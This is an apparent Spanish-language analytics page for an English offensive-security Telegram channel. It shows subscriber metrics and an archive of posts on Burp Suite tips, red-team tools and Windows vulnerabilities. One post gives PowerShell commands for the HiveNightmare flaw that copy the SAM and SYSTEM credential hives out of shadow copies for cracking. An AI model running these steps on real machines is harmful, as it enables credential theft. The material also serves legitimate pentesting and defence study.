APT

Ir al canal en Telegram

This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat

Rusia45 464 Tecnologías y Aplicaciones8 844...

📈 Análisis del canal de Telegram APT

El canal APT (@apt_notes) en el segmento lingüístico de Inglés es un actor destacado. Actualmente la comunidad reúne a 14 712 suscriptores, ocupando la posición 8 844 en la categoría Tecnologías y Aplicaciones y el puesto 45 464 en la región Rusia.

📊 Métricas de audiencia y dinámica

Desde su creación el невідомо, el proyecto ha mostrado un crecimiento acelerado, reuniendo a 14 712 suscriptores.

Según los últimos datos del 14 junio, 2026, el canal mantiene una actividad estable. En los últimos 30 días la variación de miembros fue de 432, y en las últimas 24 horas de 26, conservando un alto alcance.

Estado de verificación: No verificado
Tasa de interacción (ER): El promedio de interacción de la audiencia es 51.64%. Durante las primeras 24 horas tras publicar, el contenido suele obtener N/A% de reacciones respecto al total de suscriptores.
Alcance de las publicaciones: Cada publicación recibe en promedio 7 592 visualizaciones. En el primer día suele acumular 0 visualizaciones.
Reacciones e interacción: La audiencia responde de forma activa: el promedio de reacciones por publicación es 20.

📝 Descripción y política de contenido

El autor describe el recurso como un espacio para expresar opiniones subjetivas:
“This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat”

Gracias a la alta frecuencia de actualizaciones (últimos datos recibidos el 15 junio, 2026), el canal mantiene la vigencia y un amplio alcance. La analítica demuestra que la audiencia interactúa activamente con el contenido, lo que lo convierte en un punto de referencia dentro de la categoría Tecnologías y Aplicaciones.

14 712

Suscriptores

+2624 horas

+1137 días

+43230 días

7 592

Visitas de la publicación

Sin datos24 horas

Sin datos48 horas

51.64%

Tasa de compromiso

Sin datos

Mensajes por día

Ads index

beta

Archivo de publicaciones

14 715

1/n [JAVA] - Download API interfaces from Burp -> Extender -> APIs -> Save Interface files. - Create a package name burp and save files there, you can choose any IDE of your choice. - Make IDE ready to build JAR. - Create file name BurpExtender and add the following code.

14 715

#BurpHacksForBounties - Day 22/30 🤓🤓 Create your own Burp Extender Plugin in 3 tweets with Java. Thank you Burp Suite for making it easy #infosec #appsec #burp @BurpSuiteGuide #bugbountytips #bugbountytip #security

14 715

Windows Command-Line Obfuscation Many Windows applications have multiple ways in which the same command line can be expressed, usually for compatibility or ease-of-use reasons. As a result, command-line arguments are implemented inconsistently making detecting specific commands harder due to the number of variations. This post shows how more than 40 often-used, built-in Windows applications are vulnerable to forms of command-line obfuscation, and presents a tool for analysing other executables. # https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation #cheatsheet #cmd #pentest

14 715

Cheat sheet when designing offensive code Source: https://raw.githubusercontent.com/OTRF/API-To-Event/master/images/API-to-Sysmon.svg #redteam #sysmon

14 715

3/n Useful in : - Blind SQLi - SSRF - XSS - Detecting any out-of-bound source loads you can think of. - Evade firewall, incase outbound TCP requests are blocked and HTTP is allowed Read more at: https://portswigger.net/burp/documentation/collaborator

14 715

2/n Image 1 - Start Collaborator client Image 2 - Click copy a custom URL will be created with <>.burpcollaborator.net domain. - Use that URL in the payload Image 3 - Poll to see the request made on the URL. Image 4 - Req payload In my case: DNS, HTTP requests were made.

14 715

1/n when injection occurs with a payload that triggers interaction to some other site, to verify such scenarios this Collaborator comes in handy. Works on client-server model. The public server hosted by PortSwigger. Self-hosting is possible too. How to use a client? 👇🏻

14 715

#BurpHacksForBounties - Day 21/30 ❤️ Burp Collaborator ❤️ 🙈 Burp Suite Collaborator is a hosted network service offering from PortSwigger which is very useful in manual testing. See what, how, and why👇🏻

14 715

#BurpHacksForBounties - Tip 20/30 Burp Suite shortcut's cheat sheet by ChrisADale published on SANS. This pocket guide will increase your productivity. https://sansorg.egnyte.com/dd/x19ByeTOpS/

14 715

WINDOWS LPE "HiveNightmare" or "SeriousSAM"

CVE-2021-36934

The problem is aggravated by the fact the 'shadow copy' of the system drive where these files can be found is created when someone performs a Windows Update if that drive is larger than 128GB (!). So, even if your version of Windows 10 wasn't initially impacted, it could be after updating. 1) Check permissions:

icacls.exe C:\Windows\System32\config\SAM

2) Check shadow copies, restore points

[System.IO.File]::Exists('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM')
[System.IO.File]::Exists('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SAM')
[System.IO.File]::Exists('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\System32\config\SAM')

... and so on 3) Copy SAM and SYSTEM files from shadow copy:

[System.IO.File]::Copy('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM', 'C:\Temp\SAM')
[System.IO.File]::Copy('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM', 'C:\Temp\SYSTEM')

14 715

Plugin name: BurpBounty Scan Check Builder. It is fairly easy-to-use plugin. Install from BApp Store, create a check with simple name. Give it a severity, check enter the req/res you want to perform/check and enable it. ❤️

14 715

#BurpHacksForBounties - Tip 19/30 Adding your own scan rules to Burp Suite active/passive scanner. Include custom checks in scanner for #bugbounties without writing a single line of code. Using a plugin developed by @BurpBounty @egarme #infosec #appsec #burp #bugbountytips

14 715

🔥 HiveNightmare 🔥 Exploit allowing you to read registry hives and SAM data (sensitive) in Windows 10, as well as the SYSTEM and SECURITY hives as non-admin. This exploit uses VSC to extract the SAM, SYSTEM, and SECURITY hives even when in use, and saves them in current directory as HIVENAME-haxx, for use with whatever cracking tools, or whatever, you want. https://github.com/GossiTheDog/HiveNightmare #redteam #pentest #vuln #nightmare

14 715

Burp Suite - ninja tricks https://owasp.org/www-chapter-norway/assets/files/Burp%20suite%20ninja%20moves.pdf #burp #tricks #BugBounty

14 715

1. Create a filter for intruder response. 2. Start the payload 3. If the response contains the string you entered in "grep" that will show up in an extra column. -> You can only focus on the response you are looking for.

14 715

#BurpHacksForBounties - Day 18/30 Do you want to filter the responses in Burp Suite Intruder? And only show the ones which have specific pattern present in response? If yes try this 👇🏻 🧵 #appsec #infosec #bugbountytips #bugbountytip #burp

14 715

PetitPotam PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw function. https://github.com/topotam/PetitPotam #pentest #PetitPotam #rcp

14 715

Auditing Docker Security https://youtu.be/mQkVB6KMHCg #docker #autdit #security

14 715

Managing SSH Access at Scale with HashiCorp Vault Learn how to build scalable, role-based SSH access with SSH certificates and HashiCorp Vault. #vault

14 715

Let see this for blogspot.com, this is a reverse proxy setting that checks subdomains and routes them accordingly, now let's change the host for it. IMG 1 : Target = Host IMG 2 : Target != Host, but still the request is routed through the host.